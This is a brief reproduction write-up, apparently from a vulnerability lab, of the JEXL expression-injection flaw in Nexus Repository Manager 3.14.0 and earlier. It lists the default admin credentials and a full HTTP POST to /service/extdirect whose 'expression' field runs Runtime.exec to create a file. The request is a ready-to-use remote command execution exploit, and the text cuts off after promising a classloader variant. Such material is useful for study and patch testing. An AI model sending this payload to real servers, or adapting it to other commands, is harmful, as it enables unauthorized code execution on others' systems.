Nexus Repository Manager 3 is a software repository used to store and distribute software sources like Maven and NuGET. In versions 3.14.0 and earlier, there exists a feature for executing arbitrary JEXL expressions based on custom OrientDB functions. This feature has an unauthorized access vulnerability, which can lead to arbitrary command execution.
Access http://your-ip:8081 to view the web page.
Log in to the backend using the credentials admin:admin123, then upload any jar file under maven-releases.
To trigger this vulnerability, ensure that there is at least one package in the repository.
POST /service/extdirect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 368
Connection: close
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}As shown, /tmp/success has been successfully executed:
The principle is that the JEXL expression in the âexpressionâ field is executed.
Using a classloader to load bytecode, you can obtain a response:
